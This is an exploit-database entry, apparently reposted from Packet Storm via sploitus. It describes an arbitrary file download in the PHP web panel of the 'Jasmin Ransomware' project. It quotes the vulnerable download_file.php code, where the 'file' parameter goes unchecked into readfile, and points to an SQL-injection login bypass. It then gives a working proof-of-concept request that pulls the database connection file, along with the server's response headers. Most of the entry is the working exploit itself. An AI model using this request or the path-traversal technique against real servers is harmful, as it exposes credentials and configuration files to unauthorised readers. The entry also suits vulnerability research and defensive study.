Exploit for Jasmin Ransomware Arbitrary File Download

Name: Exploit for Jasmin Ransomware Arbitrary File Download
Rating: 5 (25 reviews)
2025-03-24 | CVSS 7.5
## https://sploitus.com/exploit?id=PACKETSTORM:189979
# Exploit Title: Jasmin Ransomware - (Authenticated) Arbitrary File Download
    # Google Dork: N/A
    # Date: 22-03-2025
    # Exploit Author: bRpsd cy[at]live.no
    # Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware
    # Software Link: https://github.com/codesiddhant/Jasmin-Ransomware
    # Version: N/A
    # Tested on: MacOS local xampp
    
    
    Authentication can be easily bypassed due to SQL Injection as mentioned in:
    https://www.exploit-db.com/exploits/52091
    
    
    
    Vulnerable file:Web Panel/download_file.php
    Vulnerable parameter:file
    Vulnerable code:
    <?php
    session_start();
    if(!isset($_SESSION['username']) ){
    	header("Location: login.php");
    }
    $file=$_GET['file'];
    if(!empty($file)){
        // Define headers
        header("Cache-Control: public");
        header("Content-Description: File Transfer");
        header("Content-Disposition: attachment; filename=$file");
        header("Content-Type: text/encoded");
        header("Content-Transfer-Encoding: binary");
        
        // Read the file
       readfile($file);
        exit;
    }else{
        echo 'The file does not exist.';
    }
    ?>
    
    
    Proof of concept:
    
    http://localhost/Jasmin-Ransomware/Web Panel/download_file.php?file=database/db_conection.php
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br, zstd
    Connection: keep-alive
    Cookie: PHPSESSID=88e519f73f9013f560ed3f0514015d8c
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: none
    Sec-Fetch-User: ?1
    
    GET: HTTP/1.1 200 OK
    Date: Sat, 22 Mar 2025 09:42:09 GMT
    Server: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1
    X-Powered-By: PHP/7.4.29
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: public
    Pragma: no-cache
    Content-Description: File Transfer
    Content-Disposition: attachment; filename=database/db_conection.php
    Content-Transfer-Encoding: binary
    Content-Length: 95
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/encoded;charset=UTF-8